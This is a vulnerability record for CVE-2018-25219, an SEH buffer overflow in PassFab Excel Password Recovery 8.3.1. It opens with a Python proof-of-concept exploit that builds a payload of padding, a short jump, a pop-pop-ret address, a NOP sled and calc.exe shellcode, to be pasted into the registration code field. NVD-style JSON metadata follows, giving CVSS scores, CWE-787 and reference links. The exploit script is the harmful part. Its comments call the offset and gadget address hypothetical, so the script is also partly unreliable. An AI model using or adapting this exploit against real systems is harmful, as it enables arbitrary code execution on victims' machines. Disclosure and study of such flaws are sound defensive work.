CVE-2018-25219

#!/usr/bin/env python3 # PoC for CVE-2018-25219 - SEH Buffer Overflow # Generates malicious payload to paste into 'Registration Code' field import struct # Bad characters typical for this type of BOF (example) bad_chars = b"\x00\x0a\x0d" # Shellcode (calc.exe for testing) shellcode = b"\x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xc2\x77\xff\xd0" # Offset to SEH handler (Needs debugging to find exact offset, hypothetical value) offset = 500 # POP POP RET instruction address (Universal or App-specific) # Example address (non-specific) seh_handler = struct.pack('<L', 0x10010005) # Padding to align to next SEH record next_seh = b"\xeb\x06\x90\x90" # short jump + nops # Payload construction payload = b"A" * offset payload += next_seh payload += seh_handler payload += b"\x90" * 32 # Nop sled payload += shellcode print(f"[*] Payload length: {len(payload)}") print(f"[*] Paste the following into the Registration Code field:") print(payload.decode('latin-1'))

{"cve": {"id": "CVE-2018-25219", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:06.090", "lastModified": "2026-03-31T15:07:22.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PassFab Excel Password Recovery 8.3.1 contains a structured exception handling buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious payload in the registration code field. Attackers can craft a buffer overflow payload with a pop-pop-ret gadget and shellcode that triggers code execution when pasted into the Licensed E-mail and Registration Code field during the registration process."}, {"lang": "es", "value": "PassFab Excel Password Recovery 8.3.1 contiene una vulnerabilidad de desbordamiento de búfer de manejo de excepciones estructurado que permite a atacantes locales ejecutar código arbitrario al proporcionar una carga útil maliciosa en el campo de código de registro. Los atacantes pueden crear una carga útil de desbordamiento de búfer con un gadget pop-pop-ret y shellcode que desencadena la ejecución de código cuando se pega en el campo de correo electrónico con licencia y código de registro durante el proceso de registro."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:passfab:excel_password_recovery:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.3.1", "matchCriteriaId": "5589221D-12ED-4DE5-8790-2F83BD81BF3E"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46301", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.passfab.com/downloads/passfab-excel-password-recovery.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.passfab.com/products/excel-password-recovery.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/passfab-excel-password-recovery-seh-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}